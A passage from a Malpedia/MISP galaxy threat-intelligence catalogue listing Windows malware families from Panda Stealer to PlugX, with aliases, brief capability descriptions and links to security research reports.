The deceptive email letters concerned business-related topics (e.g., fake product quote requests, etc.). Panda stealer is a dangerous program, and as such - its infections must be removed immediately upon detection.

The tag is: misp-galaxy:malpedia="Panda Stealer"

Panda Stealer is also known as:

Table 4223. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.panda_stealer

https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

parasite_http

The tag is: misp-galaxy:malpedia="parasite_http"

parasite_http is also known as:

Table 4229. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http

https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks

PartyTicket

PartyTicket is a Go-written ransomware, which was described as a poorly designed one by Zscaler. According to Brett Stone-Gross this malware is likely intended to be a diversion from the Hermetic wiper (aka. KillDisk.NCV, DriveSlayer) attack.

The tag is: misp-galaxy:malpedia="PartyTicket"

PartyTicket is also known as:

  • Elections GoRansom

  • HermeticRansom

  • SonicVote

Table 4230. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.partyticket

https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine

https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf

https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/

https://www.mandiant.com/resources/information-operations-surrounding-ukraine

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/

https://www.techtarget.com/searchsecurity/news/252514091/CrowdStrike-cracks-PartyTicket-ransomware-targeting-Ukraine

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://www.brighttalk.com/webcast/15591/534324

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://securelist.com/new-ransomware-trends-in-2022/106457/

https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.zscaler.com/blogs/security-research/technical-analysis-partyticket-ransomware

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf

https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/

https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-hermeticransom-victims-in-ukraine/

https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html

Passlock

Ransomware.

The tag is: misp-galaxy:malpedia="Passlock"

Passlock is also known as:

Table 4231. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.passlock

https://id-ransomware.blogspot.com

PcShare

PcShare is a open-source backdoor which has been seen modified and used by Chinese threat actors, mainly attacking countries in South East Asia.

The tag is: misp-galaxy:malpedia="PcShare"

PcShare is also known as:

Table 4234. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare

https://web.archive.org/web/20191115210757/https://threatvector.cylance.com/en_us/home/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware.html

https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf

PeddleCheap

PeddleCheap is a module of the DanderSpritz framework which surface with the "Lost in Translation" release of TheShadowBrokers leaks. In May 2020, ESET mentioned that they found mysterious samples of PeddleCheap packed with a custom packer so far exclusively attributed to Winnti.

The tag is: misp-galaxy:malpedia="PeddleCheap"

PeddleCheap is also known as:

Table 4236. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.peddlecheap

https://twitter.com/ESETresearch/status/1258353960781598721

https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/

https://www.forcepoint.com/fr/blog/security-labs/new-whitepaper-danderspritzpeddlecheap-traffic-analysis-part-1-2#

https://obscuritylabs.com/blog/2017/11/13/match-made-in-the-shadows-part-3/

Pekraut

The tag is: misp-galaxy:malpedia="Pekraut"

Pekraut is also known as:

Table 4237. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pekraut

https://www.gdatasoftware.com/blog/2020/04/35849-pekraut-german-rat-starts-gnawing

Penco

The tag is: misp-galaxy:malpedia="Penco"

Penco is also known as:

Table 4238. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.penco

PennyWise Stealer

The tag is: misp-galaxy:malpedia="PennyWise Stealer"

PennyWise Stealer is also known as:

Table 4239. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pennywise

https://blog.cyble.com/2022/06/30/infostealer/

Peppy RAT

Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.

The tag is: misp-galaxy:malpedia="Peppy RAT"

Peppy RAT is also known as:

Table 4240. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.peppy_rat

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

PetrWrap

The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim’s machine. What’s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.

The tag is: misp-galaxy:malpedia="PetrWrap"

PetrWrap is also known as:

Table 4241. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap

https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/

https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/

pgift

Information gathering and downloading tool used to deliver second stage malware to the infected system

The tag is: misp-galaxy:malpedia="pgift"

pgift is also known as:

  • ReRol

Table 4243. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift

PhanDoor

The tag is: misp-galaxy:malpedia="PhanDoor"

PhanDoor is also known as:

Table 4244. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor

AhnLabAndariel_a_Subgroup_of_Lazarus%20(3).pdf[AhnLabAndariel_a_Subgroup_of_Lazarus%20(3).pdf]

phemedrone_stealer

The tag is: misp-galaxy:malpedia="phemedrone_stealer"

phemedrone_stealer is also known as:

Table 4245. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phemedrone_stealer

https://github.com/nullixx/Phemedrone-Stealer/blob/master/README.md

Phobos

MalwareBytes states that Phobos is one of the ransomware families that are distributed via hacked Remote Desktop (RDP) connections. This isn’t surprising, as hacked RDP servers are a cheap commodity on the underground market, and can make for an attractive and cost efficient dissemination vector for threat groups.

The tag is: misp-galaxy:malpedia="Phobos"

Phobos is also known as:

Table 4247. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos

https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew

https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground

https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware

https://securelist.com/cis-ransomware/104452/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/

https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware

https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/

https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html

https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://paraflare.com/luci-spools-the-fun-with-phobos-ransomware/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://blogs.blackberry.com/en/2021/11/zebra2104

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://blog.talosintelligence.com/deep-dive-into-phobos-ransomware/

https://cert.pl/en/posts/2023/02/breaking-phobos/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://twitter.com/rivitna2/status/1674718854549831681

https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/

Phonk

The tag is: misp-galaxy:malpedia="Phonk"

Phonk is also known as:

Table 4250. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phonk

https://twitter.com/abuse_ch/status/1630111198036348928

PHOREAL

Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53

The tag is: misp-galaxy:malpedia="PHOREAL"

PHOREAL is also known as:

  • Rizzo

Table 4251. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal

https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf

https://elastic.github.io/security-research/intelligence/2022/03/02.phoreal-targets-southeast-asia-financial-sector/article/

https://www.secureworks.com/research/threat-profiles/tin-woodlawn

Phorpiex

Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.

The tag is: misp-galaxy:malpedia="Phorpiex"

Phorpiex is also known as:

  • Trik

  • phorphiex

Table 4252. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows

https://twitter.com/CPResearch/status/1447852018794643457

https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/

https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/

https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/

https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html

https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/

https://www.johannesbader.ch/2016/02/phorpiex/

https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet

https://research.checkpoint.com/2019/phorpiex-breakdown/

https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/

https://bin.re/blog/phorpiex/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/

PHOTOFORK

PHOTOFORK is a downloader which is a modified version of GZIPLOADER. It was first detected in February 2023 and was distributed by TA581 along with an unattributed threat activity cluster that facilitated initial access. In this version, the configuration file is no longer encrypted using a simple XOR algorithm with a 64-byte key. Instead, it uses a custom algorithm previously used by the Standard core loader. This algorithm decrypts DLL strings that are needed to resolve handles to the necessary DLLs later on. The strings are decrypted using an algorithm that splits the data into DWORDs and XORs it against a random key. The main objective of PHOTOFORK remains the same as GZIPLOADER, i.e. to deliver an encrypted bot and core DLL loader (forked) that loads the Forked ICEDID bot into memory using a custom PE format.

The tag is: misp-galaxy:malpedia="PHOTOFORK"

PHOTOFORK is also known as:

Table 4253. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.photofork

https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid

PHOTOLITE

PHOTOLITE is the lite version of the GZIPLOADER with limited capabilities i.e. for example it does not have any functionality to exfiltrate the host information. This new variant is observed as a follow-on payload in a TA542 Emotet campaign back in November'22. contains a static URL to download a "Bot Pack" file with a static name (botpack.dat) which results in the IcedID Lite DLL Loader, and then delivers the Forked version of IcedID Bot, leaving out the webinjects and backconnect functionality that would typically be used for banking fraud.

The tag is: misp-galaxy:malpedia="PHOTOLITE"

PHOTOLITE is also known as:

Table 4254. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.photolite

https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid

https://www.intrinsec.com/emotet-returns-and-deploys-loaders/

https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return

PhotoLoader

A loader used to deliver IcedID, fetching a fake image from which payloads are extracted.

The tag is: misp-galaxy:malpedia="PhotoLoader"

PhotoLoader is also known as:

  • GZIPLOADER

Table 4255. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader

https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid

https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns

https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/

https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns

https://isc.sans.edu/diary/29740

https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/

https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary

https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://blog.talosintelligence.com/following-the-lnk-metadata-trail

https://isc.sans.edu/diary/28636

https://www.youtube.com/watch?v=4j8t9kFLFIY

https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid

https://www.silentpush.com/blog/icedid-command-and-control-infrastructure

https://unit42.paloaltonetworks.com/wireshark-quiz-icedid-answers/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://leandrofroes.github.io/posts/Reversing-a-recent-IcedID-Crypter/

https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/

https://www.silentpush.com/blog/malicious-infrastructure-as-a-service

https://twitter.com/felixw3000/status/1521816045769662468

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1

https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/

https://www.first.org/resources/papers/amsterdam23/IcedID-FIRST-AMS-2023.pdf

https://www.elastic.co/security-labs/unpacking-icedid

https://www.team-cymru.com/post/from-chile-with-malware

https://research.openanalysis.net/icedid/bokbot/photoloader/config/2023/04/06/photoloader.html

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://sysopfb.github.io/malware,/icedid/2020/04/28/IcedIDs-updated-photoloader.html

https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes

PICKPOCKET

PICKPOCKET is a credential theft tool that dumps the user’s website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed solely utilized by APT34.

The tag is: misp-galaxy:malpedia="PICKPOCKET"

PICKPOCKET is also known as:

Table 4256. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket

https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae

PIEHOP

According to Mandiant, PIEHOP is a disruption tool written in Python and packaged with PyInstaller version 2.1+ that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU. PIEHOP expects its main function to be called via another Python file, supplying either the argument control=True or upload=True. At a minimum, it requires the following arguments: oik, user, and pwd, and if called with control=True, it must also be supplied with iec104.

The tag is: misp-galaxy:malpedia="PIEHOP"

PIEHOP is also known as:

Table 4257. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.piehop

https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response

Pikabot

Introducing Pikabot, an emerging malware family that comprises a downloader/installer, a loader, and a core backdoor component. Despite being in the early stages of development, it already demonstrates advanced techniques in evasion, injection, and anti-analysis. Notably, the loader component incorporates an array of sophisticated anti-debugging and anti-VM measures inspired by the open-source Al-Khaser project, while leveraging steganography to conceal its payload. Additionally, Pikabot utilizes a proprietary C2 framework and supports a diverse range of commands, encompassing host enumeration and advanced secondary payload injection options.

The tag is: misp-galaxy:malpedia="Pikabot"

Pikabot is also known as:

Table 4259. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot

https://research.openanalysis.net/pikabot/yara/config/loader/2023/02/26/pikabot.html

https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads

https://d01a.github.io/pikabot/

https://blog.securityonion.net/2023/09/quick-malware-analysis-pikabot.html

https://www.malware-traffic-analysis.net/2023/10/03/index.html

https://research.openanalysis.net/pikabot/debugging/string%20decryption/emulation/memulator/2023/11/19/new-pikabot-strings.html

https://kienmanowar.wordpress.com/2024/01/06/quicknote-technical-analysis-of-recent-pikabot-core-module/

https://www.hivepro.com/wp-content/uploads/2023/05/Pikabot-A-Stealthy-Backdoor-with-Ingenious-Evasion-Tactics_TA2023246.pdf

https://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398

https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot

https://minerva-labs.com/blog/beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware/

https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html

https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/

https://github.com/VenzoV/MalwareAnalysisReports/blob/main/Pikabot/Pikabot%20Loader.md

PILLOWMINT

According to FireEye, PILLOWMINT is a Point-of-Sale malware tool used to scrape track 1 and track 2 payment card data from memory. Scraped payment card data is encrypted and stored in the registry and as plaintext in a file (T1074: Data Staged) Contains additional backdoor capabilities including: Running processes Downloading and executing files (T1105: Remote File Copy) Downloading and injecting DLLs (T1055: Process Injection) Communicates with a command and control (C2) server over HTTP using AES encrypted messages (T1071: Standard Application Layer Protocol) (T1032: Standard Cryptographic Protocol)

The tag is: misp-galaxy:malpedia="PILLOWMINT"

PILLOWMINT is also known as:

Table 4260. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/

PinchDuke

According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke’s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.

The tag is: misp-galaxy:malpedia="PinchDuke"

PinchDuke is also known as:

Table 4261. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke

https://blog.f-secure.com/wp-content/uploads/2020/03/F-Secure_Dukes_Whitepaper.pdf

pipcreat

The tag is: misp-galaxy:malpedia="pipcreat"

pipcreat is also known as:

Table 4263. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat

https://www.snort.org/rule_docs/1-26941

PipeSnoop

Cisco Talos states that PipeSnoop can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint.

The tag is: misp-galaxy:malpedia="PipeSnoop"

PipeSnoop is also known as:

Table 4265. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pipesnoop

https://blog.talosintelligence.com/introducing-shrouded-snooper/

Pkybot

Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.

The tag is: misp-galaxy:malpedia="Pkybot"

Pkybot is also known as:

  • Bublik

  • Pykbot

  • TBag

Table 4270. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot

http://blog.kleissner.org/?p=788

http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot

PLAY

According to PCrisk, PLAY is the name of a ransomware-type program. Malware categorized as such operates by encrypting data and demanding ransoms for the decryption.

After we executed a sample of this ransomware on our test machine, it encrypted files and appended their filenames with a ".PLAY" extension. For example, a file titled "1.jpg" appeared as "1.jpg.PLAY", "2.png" as "2.png.PLAY", etc. Once the encryption process was completed, PLAY created a text file named "ReadMe.txt" on the desktop.

The tag is: misp-galaxy:malpedia="PLAY"

PLAY is also known as:

  • PlayCrypt

Table 4272. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.play

https://adlumin.com/post/playcrypt-ransomware-as-a-service-expands-threat-from-script-kiddies-and-sophisticated-attackers/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.avertium.com/resources/threat-reports/an-in-depth-look-at-play-ransomware

https://www.fortinet.com/blog/threat-research/ransomware-roundup-play-ransomware

https://chuongdong.com/reverse%20engineering/2022/09/03/PLAYRansomware/

https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65

https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/

https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.bleepingcomputer.com/news/security/rackspace-confirms-play-ransomware-was-behind-recent-cyberattack/

https://www.orangecyberdefense.com/global/blog/playing-the-game

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy

playwork

The tag is: misp-galaxy:malpedia="playwork"

playwork is also known as:

Table 4273. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork

https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html

PLEAD (Windows)

PLEAD is a RAT used by the actor BlackTech. FireEye uses the synonyms GOODTIMES for the RAT module and DRAWDOWN for the respective downloader.

The tag is: misp-galaxy:malpedia="PLEAD (Windows)"

PLEAD (Windows) is also known as:

  • DRAWDOWN

  • GOODTIMES

  • Linopid

Table 4274. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.plead

https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf

https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html

http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html

https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/

https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html

https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html

http://www.freebuf.com/column/159865.html

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html

https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt

https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html

https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html

https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf

https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf

https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/

https://securelist.com/apt-trends-report-q2-2019/91897/

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

PlugX

RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim’s machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.

Notable features of this malware family are the ability to execute commands on the affected machine to retrieve: machine information capture the screen send keyboard and mouse events keylogging reboot the system manage processes (create, kill and enumerate) manage services (create, start, stop, etc.); and manage Windows registry entries, open a shell, etc.

The malware also logs its events in a text log file.

The tag is: misp-galaxy:malpedia="PlugX"

PlugX is also known as:

  • Destroy RAT

  • Kaba

  • Korplug

  • RedDelta

  • Sogu

  • TIGERPLUG

Table 4277. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx

https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf

https://www.anomali.com/blog/covid-19-themes-are-being-utilized-by-threat-actors-of-varying-sophistication

https://www.us-cert.gov/ncas/alerts/TA17-117A

https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf

https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf

https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf

https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/

https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf

